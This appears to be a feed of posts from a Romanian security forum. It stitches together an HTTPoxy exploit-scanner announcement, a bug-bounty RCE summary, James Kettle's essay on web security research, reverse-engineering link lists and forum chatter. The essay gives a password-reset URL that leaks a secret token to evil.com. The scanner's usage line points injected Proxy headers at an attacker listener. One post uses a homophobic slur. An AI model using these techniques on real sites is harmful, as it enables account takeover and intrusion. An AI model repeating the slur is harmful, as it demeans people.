Leaderboard

HTTPoxy Exploit Scanner by 1N3 @CrowdShield (https://crowdshield.com) Last Updated: 20160720 ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org. REQUIREMENTS: Requires ncat to establish reverse session USAGE: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000 This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable. DISCLAIMER: I take no responsibility for wrong doing or misuse of this exploit. Download: HTTPoxyScan-master.zip or: git clone https://github.com/1N3/HTTPoxyScan.git Source

Nu exista iteme a caror valoare sa creasca de la 1-10 dolari la 400-700, imi pare rau sa te dezamagesc.

TL;DR In early 2018 I got access to a non-production Google App Engine deployment environment, where I could use internal APIs and it was considered as Remote Code Execution due to the way Google works. Thanks to this I got a reward of $36,337 as part of Google Vulnerability Rewards Program Articol complet: https://sites.google.com/site/testsitehacking/-36k-google-app-engine-rce

A cam picat toata treaba de cand a pus steamul cooldown de 7 zile intre tradeuri.

This. Mai bine pui niste bani, deschizi cateva cutii de alea, poate ai norocul sa deschizi niste cutite si le vinzi alea. Poti sa-ti iei si cateva skin-uri de $10, $25 sau $50, le bagi la blackjack sau ce saracii mai sunt speciale pentru CS:GO si aia e.

So you want to be a web security researcher? James Kettle | 23 May 2018 at 14:00 UTC Are you interested in pushing hacking techniques beyond the current state of the art and sharing your findings with the infosec community? In this post I’ll share some guidance on web security research, shaped by the opportunities and pitfalls I’ve experienced while pursuing this path myself. Breaking stuff for a living Most research is about taking existing techniques that bit further, so the first step is to get well acquainted with the current state of the art. The fastest way to achieve this is to get a job where you spend most of your time applying web hacking techniques. A lot of good people have shared detailed advice on getting into the security industry, so I’ll keep this section brief. I recommend a practice-focused approach starting with the OWASP Broken Web apps, moving on to more realistic challenges like my own hackxor.net, advancing through soft, low-reward targets on HackerOne and BugCrowd, and then finally onto well established high-payout bounty programs. Once you have a few publicly disclosed vulnerabilities it should be pretty easy to join a security consultancy and spend every day hacking stuff. There are plenty of free online resources to help you on the way, including our Burp methodology, HackerOne's Hacker101, and the OWASP testing guide. As for books, I’d recommend reading the WebApp Hacker’s Handbook, and The Tangled Web. Moving beyond known techniques Once you start working full time breaking stuff, you’ll initially learn loads but after a while your technical expertise will plateau unless you make a concerted effort to keep learning. Hunt forgotten knowledge Everyone knows you’re meant to keep up with new developments by monitoring industry experts, news aggregates and security conferences. However, to exclusively follow new developments is to overlook a treasure trove of forgotten and overlooked research. Every time you read a good quality blog post, read the entire archive. This will often unveil invaluable, forgotten tidbits of information. For example, take this post by RSnake about DNS rebinding written in 2009. DNS rebinding completely bypasses IP/firewall based access controls on websites, and the only effective way to mitigate it is by making your application whitelist the HTTP Host header. And yet at the time, people quickly assumed it was mitigated by browsers; this forgotten vulnerability only re-entered common awareness with a string of exploits nine years later. Perusing archives will also help you avoid wasting time replicating work that’s already been done by someone else, such as re-inventing a CSS attack one decade later. That said, some research is genuinely hard to find so occasional duplication is inevitable. I've had a published technique collision with one researcher only for both of us to discover that kuza55 had done the same thing five years prior. So, do your best to avoid duplicating research but if it happens anyway don’t panic - it happens to all of us. Collect diversity To connect threads and spot opportunities that other people miss, it’s crucial to collect information from a range of different sources. For a start, don’t limit yourself to reading security content - you’ll quickly find documentation can also serve as an exploit construction manual. Again, and this may be pretty obvious, but as well as trying to solve problems by Googling and posing well phrased questions to Twitter/Reddit/StackOverflow, ensure you ask colleagues - there’s a huge amount of knowledge floating around the community that people haven’t opted to share publicly. Beyond that, try to ensure your own experiences are diverse too. Doing black-box pentests for a security consultancy should expose you to a broad range of external and internal web applications, the likes of which you’ll rarely encounter in a bug bounty program. But the time constraints will rob you of the chance to understand an application with the familiarity that comes from months of bug bounty hunting with a single target. And although it’s often slow and constrained, white-box source code reviews can offer an irreplaceable alternative perspective, prompting attacks a black-box tester would never conceive. To nurture research, you ideally want a healthy mix of all three. Further experiences like playing CTFs and coding web applications can also add useful perspectives. No idea is too stupid One of the worst traps to fall into is dooming a great idea by assuming it won’t work and not trying it, because “someone else would have noticed it already” or “that is too dumb to work”. I’ve definitely fallen for this one before - one piece of research arrived two years later than it should have done thanks to such a mistake. Whether it's bypassing authentication by trying to login with the same password repeatedly, or breaking into a Google administration page by switching from your laptop to your phone, the path to your next great exploit may well require a really stupid idea. Iterate, invent, share Iterate The easiest way to get started is to find some promising research by someone else, build on it by mixing in other techniques, then apply your new approach to some live targets to see if anything interesting happens For example, this post on CORS misconfigurations pointed out an interesting behaviour and suggested that this behaviour was prevalent, but stopped short of exploring the impact on individual websites. I took this concept and applied it to bug bounty websites where I could legally explore the impact and try my hand at evading any mitigations they might have. Along the way I made some enhancements using common open redirect exploit techniques, discovered the ‘null’ origin technique by reading the CORS spec, and explored cache poisoning possibilities. Nothing in this process required sudden leaps of intuition or outstanding technical knowledge, and yet the resulting presentation and blog post was easily as well received as flashier efforts. Invent Iterating on other people’s work is great, but the best research often seems to appear out of nowhere, be it Relative Path Overwrite or Web Cache Deception. My view is that such discoveries are caused by personal experiences that act as hints. I refer to these as leads or breadcrumbs as they’re often cryptic and it may take quite a few of them to guide you all the way to a useful discovery. For example, in 2011 I was trying to crack the CSRF protection used by addons.mozilla.org. I had bypassed the token check, but they also validated that the host in the Referer header matched the current site. I asked for help on the sla.ckers forum, and ‘barbarianbob’ spotted that Django determines the current site’s host by looking at the HTTP Host header, and this could be overridden with the X-Forwarded-Host header. This could be combined with a Flash header injection vulnerability to bypass the CSRF check, but more importantly it was the first breadcrumb - it hinted that applications may rely on the host header to know their current location. A while later, I took a look at the source code of Piwik’s password reset function and found a line that looked something like: $passwordResetLink = getCurrentUrlWithoutQueryString() + $secretToken Aha, I thought. Piwik uses PHP which has hilarious path handling, so I can request a password reset at http://piwik.com/reset.php/foo;http://evil.com resulting in an email with two links, and the secret token being sent to evil.com. This idea worked, got me a bounty, and laid the foundation for the subsequent finding. The third and final crumb was the the way Piwik tried to patch this vulnerability - they replaced getCurrentUrlWithoutQueryString() with getCurrentUrlWithoutFileName(). This meant that I couldn’t use the path for an exploit anymore. Thanks to the encounter with Django earlier, I decided to dig further into the code to find how Piwik determined what the current host name was, and discovered that like Django, they used the HTTP host header, meaning I could easily generate poisoned password reset emails. As it turned out, this technique worked on addons.mozilla.org too, and Gallery, and Symfony, and Drupal, and a whole host of other sites, finally leading to Practical HTTP Host Header Attacks. By spelling out the discovery process in such a verbose way, I’ve hopefully demystified the research and made it look less like an idea spontaneously appearing out of the blue. Viewed from this perspective, it looks like the core skill (beyond pre-existing knowledge and breadth of experience) lies in recognising these breadcrumbs and persistently chasing after them. I can’t quite articulate how to do this yet, but I do know to treat as a lead anything that makes you say “this makes no sense”. Share Finally, it’s crucial to share your research with the community. This will help increase your profile and perhaps persuade your employer to allocate you some more research time. Beyond that, it will help you avoid wasting time and spur further research - commenters are really good at pointing out prior work you had no idea existed, and there’s nothing more rewarding than seeing another researcher building on your ideas. Please don’t think a technique or idea isn’t worth sharing just because you don’t have ground-breaking discovery, two logos and a presentation - just post whatever you have (ideally on a blog and not just some poorly indexed locked-down platform like Twitter). When sharing research, it’s always helpful to show at least one example of your technique being applied to exploit a real application. Without this, people will inevitably have difficulty understanding it, and may doubt that it has any practical value. Finally, presentations are great for reaching a wider audience, but beware of getting caught up in the infosec circus circuit and spending your days repeating past presentations. Conclusion I have a lot more to learn about research myself, so I hope to revisit this topic in a few years with substantially more of a clue. Also, I expect other researchers have different perspectives, and look forward to learning from any insights they decide to share. Finally, if you’re looking for some reading to get yourself started, I’ve created a list of various blogs that have inspired me over the years. Good luck and have fun! James Kettle @albinowax Sursa: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher

Table of Contents Serialization (marshaling): ............................................................................................................................ 4 Deserialization (unmarshaling): .................................................................................................................... 4 Programming language support serialization: ............................................................................................... 4 Risk for using serialization: .......................................................................................................................... 5 Serialization in Java ...................................................................................................................................... 6 Deserialization vulnerability in Java: ............................................................................................................ 6 Code flow work........................................................................................................................................... 11 Vulnerability Detection: .............................................................................................................................. 12 CVE: ........................................................................................................................................................... 17 Tools: .......................................................................................................................................................... 17 Vulnerable libraries lead to RCE: ............................................................................................................... 18 Mitigation: .................................................................................................................................................. 19 Serialization in Python ................................................................................................................................ 20 Deserialization vulnerability in Python: ..................................................................................................... 21 Pickle instructions ....................................................................................................................................... 25 Exploit vulnerability: .................................................................................................................................. 26 CVE: ........................................................................................................................................................... 29 Mitigation: .................................................................................................................................................. 29 Serialization in PHP .................................................................................................................................... 30 Deserialization vulnerability in PHP: ......................................................................................................... 30 Exploit vulnerability: .................................................................................................................................. 35 CVE: ........................................................................................................................................................... 39 Mitigation: .................................................................................................................................................. 40 Serialization in Ruby ................................................................................................................................... 41 Deserialization vulnerability in Ruby: ........................................................................................................ 42 Detect and exploit vulnerability: ................................................................................................................ 44 CVE: ........................................................................................................................................................... 53 Tools: .......................................................................................................................................................... 53 Mitigation: .................................................................................................................................................. 53 Conclusion: ................................................................................................................................................. 56 Download: https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf?rss

Awesome Radare2 A curated list of awesome projects, articles and the other materials powered by Radare2. What is Radare2? Radare is a portable reversing framework that can... Disassemble (and assemble for) many different architectures Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...) Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku Perform forensics on filesystems and data carving Be scripted in Python, Javascript, Go and more Visualize data structures of several file types Patch programs to uncover new features or fix vulnerabilities Use powerful analysis capabilities to speed up reversing Aid in software exploitation More info here. Table of Contents Books Videos Recordings Asciinemas Conferences Slides Tutorials and Blogs Tools Scripts Contributing Awesome Radare2 Materials Books R2 "Book" Radare2 Explorations Radare2 wiki Videos Recordings Creating a keygen for FrogSek KGM#1 - by @binaryheadache Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007 Introduction To Reverse Engineering With Radare2 Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2 Asciinemas metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL Filter for string's searching (urls, emails) Manual unpacking UPX on linux 64-bit Conferences r2con 2017 LinuxDays 2017 - Disassembling with radare2 SUE 2017 - Reverse Engineering Embedded ARM Devices radare demystified (33c3) r2con 2016 Reversing with Radare2 - OverDrive Conference Radare2 & frida hack-a-ton 2015 Radare from A to Z 2015 Reverse engineering embedded software using Radare2 - Linux.conf.au 2015 OggCamp - Shellcode - vext01 Slides and Workshops Radare2 cheat-sheet r2m2 - radare2 + miasm2 = ♥ Radare2 Workshop 2015 (Defcon) Emulating Code In Radare2 Radare from A to Z 2015 Radare2 Workshop 2015 (Hack.lu) Radare2 & frida hack-a-ton 2015 radare2: evolution radare2: from forensics to bindiffing Tutorials and Blogs Linux Malware by @MalwareMustDie Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn Reverse engineering a Gameboy ROM with radare2 - by @megabeets_ radare2 as an alternative to gdb-peda How to find offsets for v0rtex (by Siguza) Debugging a Forking Server with r2 Defeating IOLI with radare2 in 2017 Using r2 to analyse Minidumps Android malware analysis with Radare: Dissecting the Triada Trojan Solving game2 from the badge of Black Alps 2017 with radare2 ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2 ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2 Reversing EVM bytecode with radare2 Radare2’s Visual Mode Crackme0x03 Dissected with Radare2 Crackme0x02 Dissected with Radare2 Crackme0x01 Dissected with Radare2 Debugging Using Radare2… and Windows! - by @jacob16682 Decrypting APT33’s Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_ A journey into Radare 2 – Part 2: Exploitation - by @megabeets_ A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_ Reverse Engineering With Radare2 - by @insinuator Write-ups from RHME3 pre-qualifications at RADARE2 conference Hackover CTF 2016 - tiny_backdoor writeup radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object Reversing and Exploiting Embedded Devices: The Software Stack (Part 1) Binary Bomb with Radare2 - by @binaryheadache crackserial_linux with radare2 - by @binaryheadache Examining malware with r2 - by @binaryheadache Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx Radare2 of the Lost Magic Gadget - by @0xabe_io Radare 2 in 0x1E minutes - by @superkojiman Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2 Baleful was a challenge relased in picoctf At Gunpoint Hacklu 2014 With Radare2 - by @crowell Pwning With Radare2 - by @crowell Solving ‘heap’ from defcon 2014 qualifier with r2 - by @alvaro_fe How to radare2 a fake openssh exploit - by jvoisin Disassembling 6502 code with Radare – Part I - by @ricardoquesada Disassembling 6502 code with Radare – Part II - by @ricardoquesada Unpacking shikata-ga-nai by scripting radare2 This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2 Raspberry PI hang instruction - by @pancake Solving avatao's "R3v3rs3 4" - by @sghctoma Reverse Engineering With Radare2, Part 1 - by @sam_symons Simple crackme with Radare2 - by @futex90 Pwning With Radare2 - by @crowell Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie ROPping to Victory ROPping to Victory - Part 2, split Tools Docker image encapsulates the reverse-engineering framework Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing rarop - graphical ROP chain builder using radare2 and r2pipe Radare2 and Frida better together Android APK analyzer based on radare2 Scripts helper radare2 script to analyze UEFI firmware modules ThinkPwn Scanner - by @d_olex and @trufae radare2-lldb integration create a YARA signature for the bytes of the current function A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr) Just a simple radare2 Jupyter kernel r2scapy - a radare2 plugin that decodes packets with Scapy A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table radare2 plugin - converts asm to pseudo-C code (experimental) A python script using radare2 for decrypt and patch the strings of GootKit malware Collection of scripts for radare2 for MIPS arch Extract functions and opcodes with radare2 - by @andrewaeva r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads Patch kextd using radare2 Python-r2pipe script that draws ascii and graphviz graphs of library dependencies Simple XOR DDOS strings deobfuscator - by @NighterMan Decode multiple shellcodes encoded with msfencode - by @NighterMan Baleful CTF task plugins Contributing Please refer the guidelines at contributing.md for details. Sursa: https://github.com/dukebarman/awesome-radare2

salut, puteti limita cumva? i-am dat downvote faggotului de @dpul pt ca facea spam pt postari sa ajunga la market si a inceput sa isi faca conturi sa imi dea la toate postarile. alte exemple de utilizatori "atacati" cu downvote : https://rstforums.com/forum/profile/60415-yoyois/ https://rstforums.com/forum/profile/222485-kronzy94/

A făcut fix ce ți-a zis @Nytro mai sus. A pus console.log, document.write sau orice altceva în loc de eval. In felul asta, îți afișează codul în loc sa îl execute. Asta e doar primul pas. Ce poți faci mai departe e sa înlocuiești toate string-urile de forma '\x20\x22...' Sunt reprezentate în hex după cum notația cu \x le dă de gol. Poți face asta simplu cu un hex decoder sau automatizezi puțin cu un regex și faci replace în masă în tot fișierul. Apoi urmează partea grea. Urmărești codul și încerci sa înțelegi ce face. Când crezi ca ai înțeles ce face o variabila sau o funcție pune-i și un nume. Urmărește ce face codul dintr-un debugger (DevTools din Chrome e suficient), într-o sesiune curata de browser (e.g. incognito) și trece-l și prin Burp sau alt proxy local cum ți s-a zis mai sus. Pana ii dai de cap vezi dacă face ceva request-uri, dacă scrie ceva (fie elemente în DOM, fie valori în cookies, localstorage, sessionstorage etc.). E mult cod, mult de munca. Dacă timpul pe care îl petreci > valoarea pe care o aduce... Pierzi timpul. Dar măcar e educativ. Dacă ai nevoie de ajutor la chestii punctuale te ajut eu.

Mesajul a venit doar din dorinta de a te razbuna pentru ca ti-am dat down. Nu stiu ce sa cred, dar tot posibilul sa ai multiaccount ori cu ,,prietenii,, tai yoyois si spider. Spamer nu sunt, caut doar sa ajung in ,,Marketplace,, , doar ca mai pe toate forumurile se dau de despteti si inteligenti ca voi. Dar sincer, nu ma doare, asta e viata, primesti un prost, il faci sa inteleaga ca e prost.

Nu cred ca ne-am inteles. Eu sunt aici cu un motiv, nu sa ma amenint cu voi, degeaba o facem. Sa ai si tu o zi frumoasa!

Nu ma ajuta la nimic reputatia. So. Nu ma deranjeaza deloc.

Salutare tuturor. Eu sunt Cristi, am 21 si ma ocup cel mai mult cu trading online. Sper sa ajung sa imi fac ceva cunostinte si pe aici. O zi buna va doresc!

Sti cum e... Toata smecheria asta din capul baietilor astora se plateste usor usor.

@Nytro